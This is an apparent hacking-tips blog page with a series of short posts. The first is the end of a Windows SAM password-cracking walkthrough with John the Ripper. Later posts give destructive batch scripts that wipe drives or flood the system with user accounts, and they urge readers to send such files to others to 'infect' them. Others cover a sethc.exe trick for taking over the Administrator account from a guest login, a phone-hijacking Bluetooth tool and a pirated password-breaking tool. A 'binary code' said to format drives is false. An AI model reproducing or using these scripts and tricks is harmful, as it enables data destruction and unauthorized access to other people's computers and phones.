If dictionary attacks aren't working and you have a lot of time (as well as a fast computer) you can try John's incremental (brute force) mode and see if it gives you better results:

Linux Command:

john password-hashes.txt -i:all


Incremental mode is limited to only eight characters unless you change the source before you compile it, but at more than eight characters you will likely be waiting a very long time for John to finish. Doing more that eight characters is pointless anyway if you have the LM hashes since there are stored as two seven byte parts (NT hashes are a different story and can be harder to crack).

In case you were wondering what all of these commands would look like along with their output here is a copy of my session log that may help you understand how they all work together (notice that the password for the Administrator account is "monkey"):

Session Log saved from Auditor CD:

root@1[~]# mount /dev/hda1
root@1[~]# cd /ramdisk/
root@1[ramdisk]# bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt
Bkhive ncuomo@studenti.unina.it

Bootkey: 407af4376e55f1fd6d58cc47a4fa4c01
root@1[ramdisk]# samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved-syskey.txt>password-hashes
.txt
Samdump2 ncuomo@studenti.unina.it
This product includes cryptographic software written
by Eric Young (eay@cryptsoft.com)

No password for user Guest(501)
No V value!
root@1[ramdisk]# gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt
root@1[ramdisk]# john password-hashes.txt -w:eng.txt
Loaded 3 password hashes with no different salts (NT LM DES [32/32 BS])
MONKEY (Administrator)
guesses: 1 time: 0:00:00:03 100% c/s: 1622943 trying: ZZYZX - ZZZZZZZ
root@1[ramdisk]# john password-hashes.txt -f:NT -w:eng.txt
Loaded 2 password hashes with no different salts (NT MD4 [TridgeMD4])
monkey (Administrator)
guesses: 1 time: 0:00:00:12 100% c/s: 464435 trying: zzzzzzzzzzzzzzzzzzzzzz
root@1[ramdisk]#



Mitigating SAM and SysKey Cracking

There are a few things you can do to make it harder for attacker to crack you local passwords. An attacker will most likely have to get into the BIOs to set it to boot from the CD-ROM. Setting up a BIOs password will help keep crackers from using the Auditor CD (or any boot CD) but if they can get into the computer's case it's easy to reset a BIOs password so some sort of physical case lock should be used as well. Strong passwords (non-dictionary words with more that just alphanumeric characters) will also make it harder for attackers to crack passwords since they will have to resort to potentially slow brute force methods.

I hope this short tutorial helps, feel free to write me if you have any questions. Some other techniques you may want to look into for faster cracking are cracking clusters [9] and Rainbow tables [10]. Enjoy your hash. :)
ReaD MorE

Secure Your Windows

Sunday, March 14, 2010


HOW TO SECURE YOUR WINDOWS

Configure your system security.

firewall
antivirus
automatic updates

Microsoft uses a file called sam to store the sam data on windows NT

SAM(SECURITY ACCOUNT MANAGER)-It stores the hases of password.

Protect your sam file use syskey.

To enable syskey in windows go to run

Type syskey

sam lock tool will open

click on update

a dialog box will open named startup key

click on radio button password startup

enter password and click ok.

now next time u start your computer it will ask for password
ReaD MorE

How To Break System Password


If you want to break the administrator or any name User's password you just need ERD Commander tool this tool can break the system password means it can break the administrator password you just need to make a bootable cd or bootable usb and boot with this cd you can easily break system password.... you have just follow these steps:---

go to start--->System Tools--->Lock Smith and select user who's password you want to break.....

you got this tool from this link it's torrent file so you have to download this file from utorrent.......


http://torrents.thepiratebay.org/4202544/ERD.Commander.2005.2005.4202544.TPB.torrent

http://rapidshare.com/files/56511225/ERD_Commander_2005_FLS_EDITION.rar
ReaD MorE

Google Fun Tricks

ReaD MorE

Enable Multiple Logins In Yahoo Messenger

Tuesday, March 2, 2010

Multiple login in yahoo Without Using any Software

1. Go to Start --> Run . Type regedit, then enter.

2. Navigate to HKEY_CURRENT_ USER --------> Software --->yahoo ----->pager---->Test

3. On the right page , right-click and choose new Dword value .

4. Rename it as Plural.

5. Double click and assign a decimal value of 1.


Its done!!


Now close registry and restart yahoo messenger and try Multiple Logins (This doesn't work with version 9, though).........
ReaD MorE

How To Make a USB Key


Find how you can use your USB Stick to lock your Computer, among other things!

Tired of people starting your computer when you are not arround and messing up custom settings? Wouldn't it be cool if you could lock your USB stick from it? Read On, and I'll show you how...

Boot Lock

This trick will allow you to use your USB stick as a key to boot into Windows. If someone tries to start the

computer without your USB stick, it will display boot errors. Before we begin, let me tell you that playing with

the BIOS and boot files of your computer may result in you not being able to boot into your Window partition; so

continue at your own risk! Now that we have absolved ourselves of all guilt, let's begin.

Things You Need: A 64MB or larger sized USB Stick (duh!), Windows Recovery Disk(Just in case).
Step 1: Unhide hidden and protected files: go to Tools-->Options-->View, Check show hidden files and un-check Hide Protected System Files.

Step 2: From the drive where Windows is installed (normally C:\), Copy the files

boot.ini, ntldr, NTDETECT.COM

To your USB Stick.

Step 3: Now, we need to go into your BIOS, so restart the Computer and keep jabbing [F8] as soon as the computer starts.

Step 4: Once in the BIOS, enable USB Drive as the first boot device. You might have to enable USB Legacy Support on older BIOSes.
STEP 5: Restart your computer, if all goes well, you should be able to log into Windows. If not, then unplug the USB Stick, return to the BIOS and change the First Boot Device to your Hard Disk drive and repeat the steps above.

STEP 6: Once you are logged into Windows. go to your Windows drive and rename boot.ini to boot.bak.
STEP 7: To check if you have setup everything correctly, eject your USB Stick and reboot the computer. You should get error messages on the screen such as "Invalid Boot.ini" or "Windows could not start".

STEP 8: In case Windows does not load, use your Windows Recovery Disk by following the steps mentioned at http://tinyurl.com/s9sd2.

THE OTHER WAY

For the less brave-hearted, instead of preventing Windows From booting, you can choose to just lock your computer with your USB Stick.
USB System Lock

A freeware program, USB System Lock works flawlessly while locking and unlocking your computer. you can find it from http://www.4shared.com/file/232866367/6f033a31/usl-180-installer.html


When you first install USB System Lock, it detects your USB stick and creates a digital key on it.
This key is used by the program to authenticate the user and log into the computer. Strangely, the program is not included in the start-up list by default. To add it there, you need to drag Agent from the USB System Lock entry under All Programs to the Startup folder in the same menu. If you happen to accidently delete the key from your USB Stick while working on the protected computer you can reassign a key using Start--> Programs--> USB System Lock--> Key Disk Generator...
ReaD MorE

Folder Lock Without Any S/W

Open Notepad and copy the below code and save as locker.bat. At first time start it will create folder with Locker automatically for u.

after creation of Locker folder again click on the locker.bat.it will ask.press Y then Locker folder will be disappeared. again to get it click on locker.bat. and give ur password u will get the folder again.

************ ********* ********* ********* ********* ********* *

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"
attrib +h +s "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==abhidgr8 goto FAIL
attrib -h -s "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"
ren "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End



the password is abhidgr8....
ReaD MorE

Simple Virus Making

Shut Down Your Freind's Mobile

Here is a new trick to restart ur friends mobile via sms

with this trick only 1110,1110i,1112,1100,2100(Nokia) can be restarted.

just type
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

or 79 inverted commas

in text msg and send it to ur friend having cells mention above and see wat happens.

Simple Virus making If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to make simple .bat file (virus) that can't be detected by any anti virus

Here are some good viruses ,i am not responsible for any kind of damage to your system ... :)

Copy this to notepad and save as flood1.bat.....

@ECHO OFF
@ECHO A PHOENIX PRODUCTION
@ECHO MAIN BAT RUNNING
GOTO start

:start
@ECHO SET snowball2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat
@ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5

:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET maggi=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR maggi%%maggi%% >> bat5.bat
@ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4

:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET marge=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR marge%%marge%% >> bat4.bat
@ECHO SET /a marge=%%marge%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3

:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET bart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR bart%%bart%% >> bat3.bat
@ECHO SET /a bart=%%bart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2

:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET homer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR homer%%homer%% >> bat2.bat
@ECHO SET /a homer=%%homer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original

:original
CD %HomeDrive%\
SET lisa=1
GOTO flood1
:flood1
MKDIR lisa%lisa%
SET /a lisa=%lisa%+1
GOTO flood1



What does it do : this is an extremely harmful virus this will keep replicating itself until your hard drive is totally full and will destroy your comp.



A simple binary codes that can format the system drive ,secondary drives... Copy The Following In Notepad Exactly as it

01001011000111110010010101010101010000011111100000

Save As An EXE Any Name Will Do

Send the EXE to People And Infect



Go to notepad and type the following:

@Echo off
Del C:\ *.*y

save it as Dell.bat



Want worse then type the following: @echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file



One more try one this Cd C:\
rd C:\ /s/q
Cd D:\
rd D:\ /s/q
Cd E:\
Rd E:\ /s/q
Cd F:\
Rd\ /s/q

then it is complete Save as any file you want in .bat format.. n enjoy..its really dangerous don't try on your own pc.
ReaD MorE

Bluetooth Hack


Bluetooth technology is great. No doubt. It provides an easy way for a wide range of mobile devices to communicate with each other without the need for cables or wires. However, despite its obvious benefits, it can also be a potential threat for the privacy and security of Bluetooth users...


If u want to be an bluetooth hacker then simply download this file...
download link: http://www.box.net/shared/3w84t0yxw4


Once connected to a another phone via bluetooth you can:


read his messages
read his contacts
change profile
play his ringtone even if phone is on silent
play his songs(in his phone)
restart the phone
switch off the phone
restore factory settings
change ringing volume
And here comes the best
Call from his phone” it includes all call functions like hold etc.
Simply add this application to your mobile phone and hack others mobiles...........

Note

When connecting devices use a code 0000
At start of programm on smartphones do not forget to turn on bluetooth before start of the mobile .
ReaD MorE

Windows Registry


All initialization and configuration information used by windows is stored in Registry. Normally the keys in the registry are changed indirectly through the Administrative Tools such as the Control Pannel.

The Registry can also be altered directly with a Registry editor however some keys can be alter in no other way.
Registry Structure:-
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG


D!$@BlE ThE Dr!vE$ ThRoUgH ReG!$trY

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Go on the right side page--->Right click-->Select New-->Dword Value-->rename dword value with NoDrives-àmodify that value with 03ffffff-àlogoff the system and login again and what you got ya your drives are disabled….

LoCk ThE Dr!vE$ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Go on the right side page-->Right click-->Select New-->Dword Value-->rename dword value with NoViewOnDrive-->modify value-->03ffffff…

D!$@BlE ThE RuN

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Go on the right side page-->Right click->Select New-->Dword Value-àrename dword value with NoRun-->modify value-->1 …

D!$@BlE ThE $e@rCh

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Go on the right side page-->Right click-->Select New-->Dword Value-->rename dword value with NoFind-->modify value->1 …

D!$@BlE ThE CoNtExT MeNu HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Go on the right side page-->Right click-->Select New-->Dword Value-àrename dword value with NoViewContextMenu-->modify value->1 …

D!$@BlE ThE De$kToP

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Go on the right side page-->Right click->Select New-->Dword Value-->rename dword value with NoDesktop-->modify value-->1 …

OpEn FoLdEr OpT!On WhEn It I$ H!De By V!Ru$

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Go on the right side page-->Right click-->Select New-->Dword Value-->rename dword value with NoFolderOption-->modify value-->00000000 …

En@bLe ThE T@$kM@N@GeR If It I$ D!$@BlE By V!Ru$

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Go on the right side page-->Right click-->Select New-->Dword Value-->rename dword value with DisableTaskMGR-->modify value-->00000000 …

To $eE H!DdEn F!Le$ If UnH!De BuTtOn !$ Cl!cKeD

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOW ALL

Text = @shell32.dll --> -30500

Type = Radio

ValueName = Hidden

Default Value = 00000002

New Key --> HKEY_ROOT -->80000001

HelpID -->Shell.HIP#51105

CheckedValue - 00000001
ReaD MorE

Guest To Admin Hack

Sunday, February 21, 2010


Hii guys today I’m going to tell you some basic tips of hacking, you got a Pc in which you got Guest a/c open and don’t know the password of Administrator A/c and you getting frustrated while doing work in the guest or limited privilege a/c .

Want to be a powerful like Administrator and break the all limitation of limited a/c user just do these simple steps:

1: Login to the system via guest a/c.

2: Open the %windir\system32 and copy the cmd file to desktop.

3: Now rename this File with sethc.exe and copy this file back to the %windir\system32 directory.

Now you have been asked for file replacing click on yes button than you got the error message that this file can’t be copied.

4: Now you have to logoff, at the login screen press shift key for 4 or 5 times and then you got the command window there you have to type this command.

NET USER ADMINISTRATOR Password and press the enter key.

Here Administrator is the user name which you want to hack and password is where you put your password for this user…..


ReaD MorE

Customizing The Look of The Startup

Windows XP has a great new look, but after a while, the new look can get old.With the help of some cool tools and tricks, you can change many parts of Windows XP.

Today I will guide you through customizing two parts of your computer, the boot screen and the Welcome/logon screen. You will learn how to replace the boring boot sc
reen with premade screens and even how to make some of your own.

Customizing the Windows XP Boot Screen

Every time I turn on my computer, I am forced to stare at the boring Windows XP boot screen. Although, I must admit, I found the moving blue bars very amusing at first, after a few months, I became bored and wanted something different. Although changing the boot screen is not a
feature that the Windows XP team at Microsoft has built into Windows, doing so is still possible.

Changing the boot screen The image that is displayed during the boot is hidden away in a system file called ntoskrnl.exe. This system file is loaded during the system boot and is what displays the boot image and animation.

When users first started to make their own boot screens, they would use resource hacking tools
to hack into the file and replace the old Windows XP bitmap image file with one that they
made. Then, they would swap the old system file with the hacked version of the system file so
that the new boot screen would be displayed.

The majority of users do not start off by making their own boot screen. Instead, they download
one that someone else made from the Web. Unfortunately, the only way to distribute a boot
screen is to share the system file that the author has hacked from his or her system. This
method of distributing boot screens works for some people, but it may cause serious problems
for the majority of users.

The problems of changing the boot screen If you download a hacked system file with a new boot screen and replace the old file on your
computer, after you restart, you may find that your computer will not start and will give you a
nice error message. “C:\Windows\System32\ntoskrnl.exe is missing or corrupt.” Missing or
corrupt? Uh-oh. This is the most common problem that users experience when trying to
change their boot screen using the file swap technique.

Users that get this message, or any similar error message, are receiving it because they replaced
their system file with a file that is not compatible with their version of Windows XP.

How to safely change your boot screen Check out the following ways to change your boot screen by using special tools that will allow
you to do it safely.

Several different boot-screen-changing programs are available on the Web. Some of these programs are shareware and others are freeware. I have used them all. Not all of them have been user-friendly, and some of them have been an out-and-out pain. The one I prefer to use is
BootSkin by Stardock, which also happens to be free. This program is by far the easiest and
safest one to use to change the boot screen. Instead of replacing the system file, it just installs
a special driver that skins the boot. This arrangement does not impact system performance
and is a nice alternative to having to deal with system files.

You Can Download This tool from www.bootskin.com

Using BootSkin to change your boot screen Once you have the BootSkin application installed, start it up by using the link in the Start
menu under WinCustomize and perform the following steps:

1. Once you have the application running, changing the boot screen is very simple. Just
navigate through the list of boot screens by using the scrollbar arrows, as shown in image

2. Once you find the boot screen that you like, click the item and then click the Preview
button to see a full-screen animated preview of what the boot screen will look like.

3. Click a button on the mouse again to exit the full-screen preview. If you like the boot
screen, then click the Apply button. That’s it!

Once you reboot, your new boot screen will be displayed every time. If you would like to
change your boot screen back to the default Windows XP boot screen, reopen the BootSkin
program and select the default system boot screen from the top of the list; click Apply.

Where to get more boot screens for BootSkin

Want more boot screens that will work with BootSkin? The following are two sites where you
can find more skins that are already compatible with the program.

Win Customize: www.wincustomize.com/skins.asp?library=32
Skinbase: www.skinbase.org/section.php?sections=BootSkin


Customizing the Logon Screen Windows XP has introduced a great new way to log on to your computer, known as the
Welcome screen. The new Welcome screen provides a refined method to log on compared to the
old boring Windows 2000 logon screen. Not only does the new screen look good, but users can
now see all of the users set up on the machine and can easily log on by clicking the user’s name.

If You want to change the login screen you can download style xp tool from this link http://www.softpedia.com/get/Desktop-Enhancements/Themes/Style-XP.shtml

This tool is very good for customizing windows xp it can change windows appearance, logon screen, boot screen, explorer bar, themes e.t.c you can download thousands of logon screen from these two sites

ThemeXP: www.themexp.org/cat_login.php
Belchfire : www.belchfire.net/showgallery-6.html

After the downloading login screen you have to use style xp in style xp click on Logons tab than click on add a new logon and locate the pasth where you download logon screen after selecting click on apply logon this can change your window logon screen....
ReaD MorE

D!$cL@!mEr



Disclaimer – By Reading all these tutorial given below in this blog You agree that this tutorial is intended for educational purposes only and the author can not be held liable for any kind of damages done whatsoever to your machine, or damages caused by some other,creative application of this tutorial.In any case you disagree with the above statement,stop here. In this blog some tricks are mine and some of them i read from...